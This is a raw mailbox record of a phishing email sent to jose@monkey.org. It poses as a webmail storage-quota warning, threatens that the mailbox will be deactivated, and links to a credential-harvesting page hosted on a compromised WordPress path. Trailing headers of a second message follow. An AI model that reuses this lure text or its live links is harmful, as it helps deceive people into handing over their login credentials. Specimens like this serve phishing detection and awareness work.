From: "WEBMAIL UPDATE" <upd@webmaster.net>
Date: Wed, 13 Mar 2019 10:35:57 +0200
Return-Path: upd@webmaster.net
Message-ID: <JJT-PB17SURWNAGvq7t0000d97c@jjt-pb17surwnag.JINJIANGTOWER.COM>
X-OriginalArrivalTime: 13 Mar 2019 08:36:51.0593 (UTC) FILETIME=[E7EC0F90:01D4D977]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 60

You will not see this in a MIME-aware mail reader.
--===============1744673865==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


     ACCESS RESTRICTED ( ADD MORE STORAGE )
 Dear jose@monkey.org =

 You are running low on storage space and you will soon be restricted from =
sending or receiving emails
 Try freeing up space or  add more storage. if action is not taken your mai=
lbox quota will be deactivated
 =

   =A9 2004-2019 Webmail Server Corporation Co., Ltd. All rights reserved.
--===============1744673865==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head>
<meta http-equiv=3D"Content-Language" content=3D"en-gb">
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<title>New Page 1</title>
</head>

<body><TABLE style=3D'FONT-SIZE: 11px; MAX-WIDTH: 600px; FONT-FAMILY: "Luci=
da Grande", Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(240,24=
0,240) 1px solid; BORDER-TOP-COLOR: ; WHITE-SPACE: normal; WORD-SPACING: 0p=
x; MIN-WIDTH: 332px; BORDER-BOTTOM: rgb(240,240,240) 1px solid; TEXT-TRANSF=
ORM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; BORD=
ER-LEFT: rgb(240,240,240) 1px solid; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING:=
 normal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-=
style: initial; text-decoration-color: initial; font-variant-ligatures: nor=
mal; font-variant-caps: normal' height=3D32 cellSpacing=3D0 cellPadding=3D0=
 width=3D"55%" bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD bgColor=3D#ffe1d2 height=3D31><IMG class=3DbW style=3D"BORDER-TOP: 0px;=
 HEIGHT: 15px; BORDER-RIGHT: 0px; WIDTH: 19px; BACKGROUND: url(https://ssl.=
gstatic.com/ui/v1/icons/mail/icons2.png) no-repeat -80px 0px; BORDER-BOTTOM=
: 0px; BORDER-LEFT: 0px" src=3D"http://yeeleeoils.com.sg:2095/cpsess2003696=
207/3rdparty/roundcube/?_task=3Dmail&amp;_action=3Dget&amp;_mbox=3DINBOX&am=
p;_uid=3D41870&amp;_token=3DoaLhuUr8dKpLeOp9mvIN30dY7nR9nXor&amp;_part=3D2&=
amp;_embed=3D1&amp;_mimeclass=3Dimage" width=3D1 height=3D1><FONT style=3D"=
FONT-SIZE: 12px; FONT-WEIGHT: 700; BACKGROUND-COLOR: rgb(255,225,210)" colo=
r=3D#ff0000 face=3DArial>&nbsp; ACCESS RESTRICTED ( ADD MORE STORAGE )</FON=
T></TD></TR></TBODY></TABLE>
<P style=3D'FONT-SIZE: 11px; FONT-FAMILY: "Lucida Grande", Verdana, Arial, =
Helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFO=
RM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; ORPHA=
NS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255=
); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style:=
 initial; text-decoration-color: initial; font-variant-ligatures: normal; f=
ont-variant-caps: normal'><FONT style=3D"BACKGROUND-COLOR: rgb(255,255,225)=
" face=3DArial>Dear jose@monkey.org</FONT> </P>
<P style=3D'FONT-SIZE: 11px; FONT-FAMILY: "Lucida Grande", Verdana, Arial, =
Helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFO=
RM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; ORPHA=
NS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255=
); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style:=
 initial; text-decoration-color: initial; font-variant-ligatures: normal; f=
ont-variant-caps: normal'><FONT style=3D"BACKGROUND-COLOR: rgb(255,255,225)=
" face=3DArial>You are running low on storage space and you will soon be re=
stricted from sending or receiving emails</FONT></P>
<P style=3D'FONT-SIZE: 11px; FONT-FAMILY: "Lucida Grande", Verdana, Arial, =
Helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFO=
RM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; ORPHA=
NS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255=
); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style:=
 initial; text-decoration-color: initial; font-variant-ligatures: normal; f=
ont-variant-caps: normal'><SPAN style=3D"BACKGROUND-COLOR: rgb(255,255,225)=
">Try&nbsp;</SPAN><FONT size=3D3><A style=3D"COLOR: rgb(1,134,186)" href=3D=
"https://my-customer-business.com/wp-admin/js/late-code/source/index.php?em=
ail=3Djose@monkey.org" rel=3Dnoreferrer target=3D_blank><B><SPAN style=3D"B=
ACKGROUND-COLOR: rgb(255,255,225)">freeing up space</SPAN></B></A><SPAN sty=
le=3D"BACKGROUND-COLOR: rgb(255,255,225)">&nbsp;</SPAN></FONT><SPAN style=
=3D"FONT-SIZE: 12px; FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sa=
ns-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLO=
AT: none; FONT-WEIGHT: 400; COLOR: rgb(32,33,36); FONT-STYLE: normal; ORPHA=
NS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; BACKG=
ROUND-COLOR: rgb(255,255,225); TEXT-INDENT: 0px; -webkit-text-stroke-width:=
 0px; text-decoration-style: initial; text-decoration-color: initial; font-=
variant-ligatures: normal; font-variant-caps: normal">or&nbsp;</SPAN><FONT =
color=3D#0000ff size=3D3><SPAN style=3D"BACKGROUND-COLOR: rgb(255,255,225)"=
>&nbsp;</SPAN></FONT><FONT size=3D3><A style=3D"COLOR: rgb(1,134,186)" href=
=3D"https://my-customer-business.com/wp-admin/js/late-code/source/index.php=
?email=3Djose@monkey.org" rel=3Dnoreferrer target=3D_blank><B><SPAN style=
=3D"BACKGROUND-COLOR: rgb(255,255,225)">add more storage</SPAN></B></A><SPA=
N style=3D"BACKGROUND-COLOR: rgb(255,255,225)">.</SPAN></FONT><SPAN style=
=3D"FONT-SIZE: 12px; FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sa=
ns-serif; COLOR: rgb(32,33,36); LETTER-SPACING: normal; BACKGROUND-COLOR: r=
gb(255,255,225)">&nbsp;</SPAN><SPAN style=3D"FONT-SIZE: 12px; FONT-FAMILY: =
Roboto, RobotoDraft, Helvetica, Arial, sans-serif; WHITE-SPACE: normal; WOR=
D-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WEIGHT: 400; COLOR:=
 rgb(32,33,36); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; DISPLAY: inline =
!important; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,225); TEX=
T-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initi=
al; text-decoration-color: initial; font-variant-ligatures: normal; font-va=
riant-caps: normal">if action is not taken your mailbox quota will be deact=
ivated</SPAN></P>
<TABLE style=3D'FONT-SIZE: 11px; MAX-WIDTH: 600px; FONT-FAMILY: "Lucida Gra=
nde", Verdana, Arial, Helvetica, sans-serif; BORDER-RIGHT: rgb(240,240,240)=
 1px solid; BORDER-TOP-COLOR: ; WHITE-SPACE: normal; WORD-SPACING: 0px; MIN=
-WIDTH: 332px; BORDER-BOTTOM: rgb(240,240,240) 1px solid; TEXT-TRANSFORM: n=
one; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; BORDER-LEF=
T: rgb(240,240,240) 1px solid; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: norma=
l; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style:=
 initial; text-decoration-color: initial; font-variant-ligatures: normal; f=
ont-variant-caps: normal' height=3D32 cellSpacing=3D0 cellPadding=3D0 width=
=3D"55%" bgColor=3D#ffffff border=3D0>
<TBODY>
<TR>
<TD height=3D31><FONT size=3D1 face=3DArial><SPAN style=3D"BACKGROUND-COLOR=
: rgb(255,255,225)">=A9 2004-2019 Webmail Server Corporation Co., Ltd. All =
rights reserved.</SPAN></FONT></TD></TR></TBODY></TABLE></BODY></HTML>
--===============1744673865==--

From jose@monkey.org Thu Mar 14 06:23:47 2019 +0000
Return-Path: gaia@excellentsistemas.com.br
Delivered-To: jose@monkey.org
X-FDA: 75264836094.33.art16_5b44edc675926
X-Spam-Summary: 10,1,0,0082aa049beb8ab3,d41d8cd98f00b204,gaia@excellentsistemas.com.br,:,RULES_HIT:41:46:72:150:153:355:375:379:495:800:967:973:983:988:989:1133:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1432:1513:1515:1516:1517:1521:1533:1534:1543:1565:1593:1594:1699:1711:1714:1719:1730:1747:1777:1792:2194:2199:2393:2525:2527:2557:2561:2565:2610:2682:2685:2828:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3769:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4605:5007:6114:6261:6300:6642:6671:6672:8599:8603:8957:8987:9025:9388:10004:10049:10346:10400:11026:11257:11537:11638:11639:11658:11914:11984:12043:12073:12075:12438:12522:12555:12764:12903:12956:12986:13007:13008:13025:13139:13255:13439:13898:13975:14093:14096:14181:14655:14721:14849:18000:21080:21347:21433:21436:21451:21483:21524:21627:21819,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LF
X-HE-Tag: art16_5b44edc675926
X-Filterd-Recvd-Size: 4691
Received: from mail.excellentsistemas.com.br (mail.excellentsistemas.com.br [177.39.53.182])
	by imf09.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 14 Mar 2019 06:23:46 +0000 (UTC)
Received: (qmail 23861 invoked by uid 500); 14 Mar 2019 05:35:03 -0000
Received: from unknown (HELO excellentsistemas.com.br) (gaia@excellentsistemas.com.br@23.227.207.215)
  by mail with ESMTPA; 14 Mar 2019 05:35:02 -0000
